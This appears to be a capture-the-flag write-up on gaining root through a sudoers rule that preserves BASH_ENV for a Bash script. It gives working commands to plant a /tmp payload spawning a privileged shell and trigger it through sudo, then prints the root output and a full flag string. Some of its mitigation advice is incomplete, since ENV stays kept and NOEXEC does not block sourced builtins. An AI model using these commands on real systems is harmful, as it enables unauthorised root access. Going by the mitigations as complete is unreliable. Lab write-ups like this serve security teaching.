Executive Summary
This write-up demonstrates how a sudoers misconfiguration allows arbitrary code execution via BASH_ENV injection.
1. Reconnaissance & Enumeration
We started as ttyduser. Initial enumeration showed a clean environment, but checking sudo -l revealed a critical misconfiguration:
Matching Defaults entries for ttyduser:
    env_reset, ..., env_keep+="ENV BASH_ENV"

User ttyduser may run:
    (ALL) NOPASSWD: /usr/bin/securitycheck
2. Vulnerability Analysis
We identified a combination of two factors leading to RCE as root:
env_keep+="ENV BASH_ENV": sudo is configured to preserve the ENV and BASH_ENV variables across the privilege change.
Target Script: Checking the target:
head -n 1 /usr/bin/securitycheck
# Output: #!/bin/bash
Since the script uses the Bash shebang, sudo will invoke bash to execute it. When Bash starts non-interactively, it looks for the BASH_ENV variable and sources the file it points to before executing the script.
3. Exploitation
We used a temporary payload script to inject our code.
The Professional Approach:
# Create a simple payload
echo "/bin/bash -p" > /tmp/pwn.sh
chmod +x /tmp/pwn.sh # Professional practice: avoid 777

# Trigger the exploit
sudo BASH_ENV=/tmp/pwn.sh /usr/bin/securitycheck
Note: We used chmod +x to maintain clean permissions and ensure the payload is executable by the shell session.
4. Flag Retrieval
# id
# uid=0(root) gid=0(root)
cat /root/flag.txt
Flag: Flag{QCFAd01HcGp0Ykk3ei9Mcm9rU2YzcXlYbm9Yc1lWYTdBb3RsWGppZlZOcFlVaz0wMWEwZTkzZmFmODJmNDE4}
5. Hardening & Mitigation
To properly secure this environment:
Remove ENV BASH_ENV from env_keep: This is the primary vector.
Enforce env_reset: Ensure sudo strictly scrubs the environment unless explicitly whitelisted.
Use the NOEXEC tag: In /etc/sudoers, use the NOEXEC tag to prevent the command from executing other programs:
ttyduser ALL=(ALL) NOEXEC: /usr/bin/securitycheck
Secure Scripting: Use #!/bin/sh (which doesn't respect BASH_ENV on many systems) or use bash -p (privileged mode) to ignore environment-defined initialization files.